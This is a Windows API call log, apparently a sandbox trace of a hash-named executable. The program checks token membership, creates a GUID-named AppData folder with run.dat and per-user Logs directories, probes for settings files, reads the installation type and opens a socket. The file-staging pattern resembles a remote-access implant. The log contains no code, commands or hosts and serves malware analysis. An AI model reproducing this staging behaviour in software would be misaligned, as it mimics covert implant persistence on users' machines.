[0202.749] DuplicateTokenEx (in: hExistingToken=0x2dc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x19e9f0 | out: phNewToken=0x19e9f0*=0x2e0) returned 1
[0202.749] GetLastError () returned 0x7f
[0202.750] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19ea38 | out: TokenInformation=0x0, ReturnLength=0x19ea38) returned 0
[0202.750] GetLastError () returned 0x7a
[0202.750] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x685a98
[0202.750] GetLastError () returned 0x7a
[0202.750] GetTokenInformation (in: TokenHandle=0x2dc, TokenInformationClass=0x8, TokenInformation=0x685a98, TokenInformationLength=0x4, ReturnLength=0x19ea38 | out: TokenInformation=0x685a98, ReturnLength=0x19ea38) returned 1
[0202.750] GetLastError () returned 0x7a
[0202.755] CheckTokenMembership (in: TokenHandle=0x2e0, SidToCheck=0x24aa43c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19e9cc | out: IsMember=0x19e9cc) returned 1
[0202.755] GetLastError () returned 0x7a
[0202.755] CloseHandle (hObject=0x2e0) returned 1
[0202.755] GetLastError () returned 0x7a
[0202.756] GetCurrentProcess () returned 0xffffffff
[0202.781] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x673930 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0
[0202.782] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19e524, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25
[0202.782] GetLastError () returned 0x3f0
[0202.783] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778", nBufferLength=0x105, lpBuffer=0x19e598, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778", lpFilePart=0x0) returned 0x4a
[0202.783] GetLastError () returned 0x3f0
[0202.784] SetErrorMode (uMode=0x1) returned 0x0
[0202.785] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.785] GetLastError () returned 0x2
[0202.785] SetErrorMode (uMode=0x0) returned 0x1
[0202.785] SetErrorMode (uMode=0x1) returned 0x0
[0202.786] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x1b68123c, ftLastAccessTime.dwHighDateTime=0x1d7b45e, ftLastWriteTime.dwLowDateTime=0x1b68123c, ftLastWriteTime.dwHighDateTime=0x1d7b45e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0202.786] GetLastError () returned 0x2
[0202.786] SetErrorMode (uMode=0x0) returned 0x1
[0202.786] SetErrorMode (uMode=0x1) returned 0x0
[0202.786] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
[0202.786] GetLastError () returned 0x2
[0202.787] SetErrorMode (uMode=0x0) returned 0x1
[0202.787] SetErrorMode (uMode=0x1) returned 0x0
[0202.787] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0202.787] GetLastError () returned 0x2
[0202.787] SetErrorMode (uMode=0x0) returned 0x1
[0202.787] SetErrorMode (uMode=0x1) returned 0x0
[0202.787] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0202.787] GetLastError () returned 0x2
[0202.787] SetErrorMode (uMode=0x0) returned 0x1
[0202.788] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778"), lpSecurityAttributes=0x0) returned 1
[0202.791] GetLastError () returned 0x2
[0202.806] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat", nBufferLength=0x105, lpBuffer=0x19e58c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat", lpFilePart=0x0) returned 0x52
[0202.806] GetLastError () returned 0x2
[0202.806] SetErrorMode (uMode=0x1) returned 0x0
[0202.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\run.dat"), fInfoLevelId=0x0, lpFileInformation=0x19ea0c | out: lpFileInformation=0x19ea0c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.807] GetLastError () returned 0x2
[0202.807] SetErrorMode (uMode=0x0) returned 0x1
[0202.808] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat", nBufferLength=0x105, lpBuffer=0x19e474, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat", lpFilePart=0x0) returned 0x52
[0202.808] GetLastError () returned 0x2
[0202.808] SetErrorMode (uMode=0x1) returned 0x0
[0202.809] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\run.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0
[0202.810] GetLastError () returned 0x0
[0202.810] GetFileType (hFile=0x2e0) returned 0x1
[0202.811] SetErrorMode (uMode=0x0) returned 0x1
[0202.811] GetFileType (hFile=0x2e0) returned 0x1
[0202.812] WriteFile (in: hFile=0x2e0, lpBuffer=0x24ac278*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x19e99c, lpOverlapped=0x0 | out: lpBuffer=0x24ac278*, lpNumberOfBytesWritten=0x19e99c*=0x8, lpOverlapped=0x0) returned 1
[0202.815] GetLastError () returned 0x0
[0202.815] CloseHandle (hObject=0x2e0) returned 1
[0202.817] GetLastError () returned 0x0
[0202.844] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x673930 | out: pszPath="C:\\Program Files (x86)") returned 0x0
[0202.846] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x19e580, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16
[0202.846] GetLastError () returned 0x3f0
[0202.849] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Exceptions\\1.2.2.0", nBufferLength=0x105, lpBuffer=0x19e5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Exceptions\\1.2.2.0", lpFilePart=0x0) returned 0x5d
[0202.849] GetLastError () returned 0x3f0
[0202.849] SetErrorMode (uMode=0x1) returned 0x0
[0202.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Exceptions\\1.2.2.0" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\exceptions\\1.2.2.0"), fInfoLevelId=0x0, lpFileInformation=0x19ea48 | out: lpFileInformation=0x19ea48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.849] GetLastError () returned 0x3
[0202.849] SetErrorMode (uMode=0x0) returned 0x1
[0202.875] strncat_s (in: _Destination="System.Collections.Generic", _SizeInBytes=0x29, _Source=".", _MaxCount=0xffffffff | out: _Destination="System.Collections.Generic.") returned 0x0
[0202.936] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\catalog.dat", nBufferLength=0x105, lpBuffer=0x19e448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\catalog.dat", lpFilePart=0x0) returned 0x56
[0202.936] GetLastError () returned 0x3
[0202.936] SetErrorMode (uMode=0x1) returned 0x0
[0202.936] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\catalog.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\catalog.dat"), fInfoLevelId=0x0, lpFileInformation=0x19e8c8 | out: lpFileInformation=0x19e8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.937] GetLastError () returned 0x2
[0202.937] SetErrorMode (uMode=0x0) returned 0x1
[0202.951] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\storage.dat", nBufferLength=0x105, lpBuffer=0x19e450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\storage.dat", lpFilePart=0x0) returned 0x56
[0202.953] GetLastError () returned 0x2
[0202.953] SetErrorMode (uMode=0x1) returned 0x0
[0202.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\storage.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\storage.dat"), fInfoLevelId=0x0, lpFileInformation=0x19e8d0 | out: lpFileInformation=0x19e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.953] GetLastError () returned 0x2
[0202.953] SetErrorMode (uMode=0x0) returned 0x1
[0203.332] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", nBufferLength=0x105, lpBuffer=0x19e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", lpFilePart=0x0) returned 0x57
[0203.333] GetLastError () returned 0x2
[0203.333] SetErrorMode (uMode=0x1) returned 0x0
[0203.333] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bin"), fInfoLevelId=0x0, lpFileInformation=0x19e9f0 | out: lpFileInformation=0x19e9f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0203.333] GetLastError () returned 0x2
[0203.333] SetErrorMode (uMode=0x0) returned 0x1
[0203.818] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak", nBufferLength=0x105, lpBuffer=0x19e488, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak", lpFilePart=0x0) returned 0x57
[0203.819] GetLastError () returned 0x0
[0203.819] SetErrorMode (uMode=0x1) returned 0x0
[0203.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bak"), fInfoLevelId=0x0, lpFileInformation=0x19e908 | out: lpFileInformation=0x19e908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0203.819] GetLastError () returned 0x2
[0203.819] SetErrorMode (uMode=0x0) returned 0x1
[0204.062] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19dc64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0204.062] GetLastError () returned 0x0
[0204.087] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0204.087] GetLastError () returned 0x0
[0204.108] GetUserNameW (in: lpBuffer=0x673930, pcbBuffer=0x19e25c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19e25c) returned 1
[0204.274] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs\\RDhJ0CNFevzX", nBufferLength=0x105, lpBuffer=0x19dd9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs\\RDhJ0CNFevzX", lpFilePart=0x0) returned 0x5c
[0204.274] GetLastError () returned 0x0
[0204.274] SetErrorMode (uMode=0x1) returned 0x0
[0204.274] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\logs\\rdhj0cnfevzx"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0204.274] GetLastError () returned 0x3
[0204.274] SetErrorMode (uMode=0x0) returned 0x1
[0204.275] SetErrorMode (uMode=0x1) returned 0x0
[0204.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\logs"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0204.275] GetLastError () returned 0x2
[0204.275] SetErrorMode (uMode=0x0) returned 0x1
[0204.275] SetErrorMode (uMode=0x1) returned 0x0
[0204.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d98709c, ftCreationTime.dwHighDateTime=0x1d7b45e, ftLastAccessTime.dwLowDateTime=0x2d9b6ade, ftLastAccessTime.dwHighDateTime=0x1d7b45e, ftLastWriteTime.dwLowDateTime=0x2d9b6ade, ftLastWriteTime.dwHighDateTime=0x1d7b45e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
[0204.275] GetLastError () returned 0x2
[0204.275] SetErrorMode (uMode=0x0) returned 0x1
[0204.275] SetErrorMode (uMode=0x1) returned 0x0
[0204.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2d98709c, ftLastAccessTime.dwHighDateTime=0x1d7b45e, ftLastWriteTime.dwLowDateTime=0x2d98709c, ftLastWriteTime.dwHighDateTime=0x1d7b45e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0204.275] GetLastError () returned 0x2
[0204.275] SetErrorMode (uMode=0x0) returned 0x1
[0204.275] SetErrorMode (uMode=0x1) returned 0x0
[0204.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
[0204.275] GetLastError () returned 0x2
[0204.275] SetErrorMode (uMode=0x0) returned 0x1
[0204.276] SetErrorMode (uMode=0x1) returned 0x0
[0204.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0204.276] GetLastError () returned 0x2
[0204.276] SetErrorMode (uMode=0x0) returned 0x1
[0204.276] SetErrorMode (uMode=0x1) returned 0x0
[0204.276] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0204.276] GetLastError () returned 0x2
[0204.276] SetErrorMode (uMode=0x0) returned 0x1
[0204.276] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\logs"), lpSecurityAttributes=0x0) returned 1
[0204.277] GetLastError () returned 0x2
[0204.277] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\logs\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 1
[0204.277] GetLastError () returned 0x2
[0204.619] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19ab7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0204.619] GetLastError () returned 0x3
[0204.619] SetErrorMode (uMode=0x1) returned 0x0
[0204.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19b024 | out: lpFileInformation=0x19b024*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0204.619] GetLastError () returned 0x2
[0204.619] SetErrorMode (uMode=0x0) returned 0x1
[0204.797] GetWindowThreadProcessId (in: hWnd=0x4024a, lpdwProcessId=0x19e21c | out: lpdwProcessId=0x19e21c) returned 0xce0
[0204.797] GetCurrentThreadId () returned 0xce0
[0204.837] CoCreateGuid (in: pguid=0x19ea7c | out: pguid=0x19ea7c*(Data1=0xba084fd6, Data2=0x923d, Data3=0x4b95, Data4=([0]=0x84, [1]=0x7a, [2]=0xe4, [3]=0xc8, [4]=0xef, [5]=0xdd, [6]=0xc9, [7]=0x53))) returned 0x0
[0204.855] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x673930 | out: lpWSAData=0x673930) returned 0
[0204.863] GetLastError () returned 0x0
[0204.871] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e1c4 | out: phkResult=0x19e1c4*=0x3e8) returned 0x0
[0204.871] RegQueryValueExW (in: hKey=0x3e8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e20c, lpData=0x0, lpcbData=0x19e208*=0x0 | out: lpType=0x19e20c*=0x1, lpData=0x0, lpcbData=0x19e208*=0xe) returned 0x0
[0204.873] RegQueryValueExW (in: hKey=0x3e8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e20c, lpData=0x673930, lpcbData=0x19e208*=0xe | out: lpType=0x19e20c*=0x1, lpData="Client", lpcbData=0x19e208*=0xe) returned 0x0
[0204.873] RegCloseKey (hKey=0x3e8) returned 0x0
[0204.880] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ec
[0205.181] GetLastError () returned 0x0
[0205.181] setsockopt (s=0x3ec, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0205.181] GetLastError () returned 0x273a
[0205.181] closesocket (s=0x3ec) returned 0
[0205.182] GetLastError () returned 0x0
